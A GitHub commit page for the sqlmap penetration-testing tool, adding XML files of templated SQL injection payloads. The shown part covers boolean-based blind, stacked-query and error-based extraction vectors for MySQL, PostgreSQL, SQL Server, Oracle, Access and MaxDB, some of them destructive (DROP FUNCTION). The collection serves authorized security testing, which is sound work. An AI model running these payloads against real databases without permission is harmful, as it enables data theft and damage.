mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-22 17:46:37 +03:00
split payloads in different files
This commit is contained in:
parent
daa8e0d8c5
commit
6cc092b926
File diff suppressed because it is too large
Load Diff
671
xml/payloads/01_boolean_blind.xml
Normal file
671
xml/payloads/01_boolean_blind.xml
Normal file
|
@ -0,0 +1,671 @@
|
|||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
|
||||
<!--
|
||||
Tag: <test>
|
||||
SQL injection test definition.
|
||||
|
||||
Sub-tag: <title>
|
||||
Title of the test.
|
||||
|
||||
Sub-tag: <stype>
|
||||
SQL injection family type.
|
||||
|
||||
Valid values:
|
||||
1: Boolean-based blind SQL injection
|
||||
2: Error-based queries SQL injection
|
||||
3: UNION query SQL injection
|
||||
4: Stacked queries SQL injection
|
||||
5: Time-based blind SQL injection
|
||||
6: Inline queries SQL injection
|
||||
|
||||
Sub-tag: <level>
|
||||
From which level check for this test.
|
||||
|
||||
Valid values:
|
||||
1: Always (<100 requests)
|
||||
2: Try a bit harder (100-200 requests)
|
||||
3: Good number of requests (200-500 requests)
|
||||
4: Extensive test (500-1000 requests)
|
||||
5: You have plenty of time (>1000 requests)
|
||||
|
||||
Sub-tag: <risk>
|
||||
Likelihood of a payload to damage the data integrity.
|
||||
|
||||
Valid values:
|
||||
0: No risk
|
||||
1: Low risk
|
||||
2: Medium risk
|
||||
3: High risk
|
||||
|
||||
Sub-tag: <clause>
|
||||
In which clause the payload can work.
|
||||
|
||||
NOTE: for instance, there are some payload that do not have to be
|
||||
tested as soon as it has been identified whether or not the
|
||||
injection is within a WHERE clause condition.
|
||||
|
||||
Valid values:
|
||||
0: Always
|
||||
1: WHERE / HAVING
|
||||
2: GROUP BY
|
||||
3: ORDER BY
|
||||
4: LIMIT
|
||||
5: OFFSET
|
||||
6: TOP
|
||||
7: Table name
|
||||
8: Column name
|
||||
|
||||
A comma separated list of these values is also possible.
|
||||
|
||||
Sub-tag: <where>
|
||||
Where to add our '<prefix> <payload><comment> <suffix>' string.
|
||||
|
||||
Valid values:
|
||||
1: Append the string to the parameter original value
|
||||
2: Replace the parameter original value with a negative random
|
||||
integer value and append our string
|
||||
3: Replace the parameter original value with our string
|
||||
|
||||
Sub-tag: <vector>
|
||||
The payload that will be used to exploit the injection point.
|
||||
|
||||
Sub-tag: <request>
|
||||
What to inject for this test.
|
||||
|
||||
Sub-tag: <payload>
|
||||
The payload to test for.
|
||||
|
||||
Sub-tag: <comment>
|
||||
Comment to append to the payload, before the suffix.
|
||||
|
||||
Sub-tag: <char>
|
||||
Character to use to bruteforce number of columns in UNION
|
||||
query SQL injection tests.
|
||||
|
||||
Sub-tag: <columns>
|
||||
Range of columns to test for in UNION query SQL injection
|
||||
tests.
|
||||
|
||||
Sub-tag: <response>
|
||||
How to identify if the injected payload succeeded.
|
||||
|
||||
Sub-tag: <comparison>
|
||||
Perform a request with this string as the payload and compare
|
||||
the response with the <payload> response. Apply the comparison
|
||||
algorithm.
|
||||
|
||||
NOTE: useful to test for boolean-based blind SQL injections.
|
||||
|
||||
Sub-tag: <grep>
|
||||
Regular expression to grep for in the response body.
|
||||
|
||||
NOTE: useful to test for error-based SQL injection.
|
||||
|
||||
Sub-tag: <time>
|
||||
Time in seconds to wait before the response is returned.
|
||||
|
||||
NOTE: useful to test for time-based blind and stacked queries
|
||||
SQL injections.
|
||||
|
||||
Sub-tag: <union>
|
||||
Calls unionTest() function.
|
||||
|
||||
NOTE: useful to test for UNION query (inband) SQL injection.
|
||||
|
||||
Sub-tag: <details>
|
||||
Which details can be infered if the payload succeed.
|
||||
|
||||
Sub-tags: <dbms>
|
||||
What is the database management system (e.g. MySQL).
|
||||
|
||||
Sub-tags: <dbms_version>
|
||||
What is the database management system version (e.g. 5.0.51).
|
||||
|
||||
Sub-tags: <os>
|
||||
What is the database management system underlying operating
|
||||
system.
|
||||
|
||||
<test>
|
||||
<title></title>
|
||||
<stype></stype>
|
||||
<level></level>
|
||||
<risk></risk>
|
||||
<clause></clause>
|
||||
<where></where>
|
||||
<vector></vector>
|
||||
<request>
|
||||
<payload></payload>
|
||||
<comment></comment>
|
||||
<char></char>
|
||||
<columns></columns>
|
||||
</request>
|
||||
<response>
|
||||
<comparison></comparison>
|
||||
<grep></grep>
|
||||
<time></time>
|
||||
<union></union>
|
||||
</response>
|
||||
<details>
|
||||
<dbms></dbms>
|
||||
<dbms_version></dbms_version>
|
||||
<os></os>
|
||||
</details>
|
||||
</test>
|
||||
-->
|
||||
|
||||
<root>
|
||||
<!-- Boolean-based blind tests - WHERE/HAVING clause -->
|
||||
<test>
|
||||
<title>AND boolean-based blind - WHERE or HAVING clause</title>
|
||||
<stype>1</stype>
|
||||
<level>1</level>
|
||||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [INFERENCE]</vector>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=[RANDNUM]</payload>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
|
||||
</response>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>AND boolean-based blind - WHERE or HAVING clause (MySQL comment)</title>
|
||||
<stype>1</stype>
|
||||
<level>4</level>
|
||||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [INFERENCE]</vector>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=[RANDNUM]</payload>
|
||||
<comment>#</comment>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>AND boolean-based blind - WHERE or HAVING clause (Generic comment)</title>
|
||||
<stype>1</stype>
|
||||
<level>4</level>
|
||||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [INFERENCE]</vector>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=[RANDNUM]</payload>
|
||||
<comment>-- </comment>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
|
||||
</response>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>OR boolean-based blind - WHERE or HAVING clause</title>
|
||||
<stype>1</stype>
|
||||
<level>2</level>
|
||||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<where>2</where>
|
||||
<vector>OR ([INFERENCE])</vector>
|
||||
<request>
|
||||
<payload>OR ([RANDNUM]=[RANDNUM])</payload>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>OR ([RANDNUM]=[RANDNUM1])</comparison>
|
||||
</response>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>OR boolean-based blind - WHERE or HAVING clause (MySQL comment)</title>
|
||||
<stype>1</stype>
|
||||
<level>3</level>
|
||||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<where>2</where>
|
||||
<vector>OR ([INFERENCE])</vector>
|
||||
<request>
|
||||
<payload>OR ([RANDNUM]=[RANDNUM])</payload>
|
||||
<comment>#</comment>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>OR ([RANDNUM]=[RANDNUM1])</comparison>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>OR boolean-based blind - WHERE or HAVING clause (Generic comment)</title>
|
||||
<stype>1</stype>
|
||||
<level>3</level>
|
||||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<where>2</where>
|
||||
<vector>OR ([INFERENCE])</vector>
|
||||
<request>
|
||||
<payload>OR ([RANDNUM]=[RANDNUM])</payload>
|
||||
<comment>-- </comment>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>OR ([RANDNUM]=[RANDNUM1])</comparison>
|
||||
</response>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)</title>
|
||||
<stype>1</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))</vector>
|
||||
<request>
|
||||
<payload>RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 0x28 END))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 0x28 END))</comparison>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
<!-- End of boolean-based blind tests - WHERE or HAVING clause -->
|
||||
|
||||
<!-- Boolean-based blind tests - Parameter replace -->
|
||||
<test>
|
||||
<title>Generic boolean-based blind - Parameter replace (original value)</title>
|
||||
<stype>1</stype>
|
||||
<level>2</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>3</where>
|
||||
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</vector>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</comparison>
|
||||
</response>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)</title>
|
||||
<stype>1</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>3</where>
|
||||
<vector>MAKE_SET([INFERENCE],[ORIGVALUE])</vector>
|
||||
<request>
|
||||
<payload>MAKE_SET([RANDNUM]=[RANDNUM],[ORIGVALUE])</payload>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>MAKE_SET([RANDNUM]=[RANDNUM1],[ORIGVALUE])</comparison>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL boolean-based blind - Parameter replace (ELT - original value)</title>
|
||||
<stype>1</stype>
|
||||
<level>4</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>3</where>
|
||||
<vector>ELT([INFERENCE],[ORIGVALUE])</vector>
|
||||
<request>
|
||||
<payload>ELT([RANDNUM]=[RANDNUM],[ORIGVALUE])</payload>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>ELT([RANDNUM]=[RANDNUM1],[ORIGVALUE])</comparison>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL boolean-based blind - Parameter replace (bool*int - original value)</title>
|
||||
<stype>1</stype>
|
||||
<level>4</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>3</where>
|
||||
<vector>([INFERENCE])*[ORIGVALUE]</vector>
|
||||
<request>
|
||||
<payload>([RANDNUM]=[RANDNUM])*[ORIGVALUE]</payload>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>([RANDNUM]=[RANDNUM1])*[ORIGVALUE]</comparison>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 5.0 boolean-based blind - Parameter replace (original value)</title>
|
||||
<stype>1</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>3</where>
|
||||
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</comparison>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
<dbms_version>>= 5.0</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL < 5.0 boolean-based blind - Parameter replace (original value)</title>
|
||||
<stype>1</stype>
|
||||
<level>4</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>3</where>
|
||||
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value)</title>
|
||||
<stype>1</stype>
|
||||
<level>3</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>3</where>
|
||||
<vector>(SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)</vector>
|
||||
<request>
|
||||
<payload>(SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>(SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)</comparison>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>PostgreSQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)</title>
|
||||
<stype>1</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,3</clause>
|
||||
<where>3</where>
|
||||
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Microsoft SQL Server</dbms>
|
||||
<dbms>Sybase</dbms>
|
||||
<os>Windows</os>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Oracle boolean-based blind - Parameter replace (original value)</title>
|
||||
<stype>1</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,3</clause>
|
||||
<where>3</where>
|
||||
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
|
||||
<request>
|
||||
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</comparison>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Oracle</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Microsoft Access boolean-based blind - Parameter replace (original value)</title>
|
||||
<stype>1</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,3</clause>
|
||||
<where>3</where>
|
||||
<vector>IIF([INFERENCE],[ORIGVALUE],1/0)</vector>
|
||||
<request>
|
||||
<payload>IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)</comparison>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Microsoft Access</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>SAP MaxDB boolean-based blind - Parameter replace (original value)</title>
|
||||
<stype>1</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,3</clause>
|
||||
<where>3</where>
|
||||
<vector>(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>
|
||||
<request>
|
||||
<payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)</comparison>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>SAP MaxDB</dbms>
|
||||
</details>
|
||||
</test>
|
||||
<!-- End of boolean-based blind tests - Parameter replace -->
|
||||
|
||||
<!-- Boolean-based blind tests - GROUP BY and ORDER BY clauses -->
|
||||
<test>
|
||||
<title>Generic boolean-based blind - GROUP BY and ORDER BY clauses</title>
|
||||
<stype>1</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/(SELECT 0) END))</vector>
|
||||
<request>
|
||||
<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END))</comparison>
|
||||
</response>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)</title>
|
||||
<stype>1</stype>
|
||||
<level>4</level>
|
||||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</vector>
|
||||
<request>
|
||||
<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))</comparison>
|
||||
</response>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses</title>
|
||||
<stype>1</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
|
||||
<request>
|
||||
<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</comparison>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
<dbms_version>>= 5.0</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses</title>
|
||||
<stype>1</stype>
|
||||
<level>4</level>
|
||||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
|
||||
<request>
|
||||
<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause</title>
|
||||
<stype>1</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>3</clause>
|
||||
<where>1</where>
|
||||
<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
|
||||
<request>
|
||||
<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Microsoft SQL Server</dbms>
|
||||
<dbms>Sybase</dbms>
|
||||
<os>Windows</os>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Oracle boolean-based blind - GROUP BY and ORDER BY clauses</title>
|
||||
<stype>1</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
|
||||
<request>
|
||||
<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</comparison>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Oracle</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Microsoft Access boolean-based blind - GROUP BY and ORDER BY clauses</title>
|
||||
<stype>1</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>,IIF([INFERENCE],[ORIGVALUE],1/0)</vector>
|
||||
<request>
|
||||
<payload>,IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>,IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)</comparison>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Microsoft Access</dbms>
|
||||
</details>
|
||||
</test>
|
||||
<!-- TODO: check against SAP MaxDB -->
|
||||
<!-- End of boolean-based blind tests - GROUP BY and ORDER BY clauses -->
|
||||
|
||||
<!-- Stacked conditional-error blind queries tests -->
|
||||
<test>
|
||||
<title>PostgreSQL stacked conditional-error blind queries</title>
|
||||
<stype>1</stype>
|
||||
<level>3</level>
|
||||
<risk>0</risk>
|
||||
<clause>0</clause>
|
||||
<where>2</where>
|
||||
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</vector>
|
||||
<request>
|
||||
<payload>; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</payload>
|
||||
<comment>--</comment>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</comparison>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>PostgreSQL</dbms>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>Microsoft SQL Server/Sybase stacked conditional-error blind queries</title>
|
||||
<stype>1</stype>
|
||||
<level>3</level>
|
||||
<risk>0</risk>
|
||||
<clause>0</clause>
|
||||
<where>1</where>
|
||||
<vector>; IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</vector>
|
||||
<request>
|
||||
<payload>; IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</payload>
|
||||
<comment>--</comment>
|
||||
</request>
|
||||
<response>
|
||||
<comparison>; IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</comparison>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>Microsoft SQL Server</dbms>
|
||||
<dbms>Sybase</dbms>
|
||||
<os>Windows</os>
|
||||
</details>
|
||||
</test>
|
||||
<!-- End of stacked conditional-error blind queries tests -->
|
||||
</root>
|
854
xml/payloads/02_error_based.xml
Normal file
854
xml/payloads/02_error_based.xml
Normal file
|
@ -0,0 +1,854 @@
|
|||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
|
||||
<root>
|
||||
<!-- Error-based tests - WHERE or HAVING clause -->
|
||||
<test>
|
||||
<title>MySQL >= 5.0 AND error-based - WHERE or HAVING clause</title>
|
||||
<stype>2</stype>
|
||||
<level>1</level>
|
||||
<risk>0</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<vector>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
|
||||
<request>
|
||||
<payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
<dbms_version>>= 5.0</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)</title>
|
||||
<stype>2</stype>
|
||||
<level>2</level>
|
||||
<risk>0</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<vector>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
|
||||
<request>
|
||||
<payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
<dbms_version>>= 5.1</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)</title>
|
||||
<stype>2</stype>
|
||||
<level>3</level>
|
||||
<risk>0</risk>
|
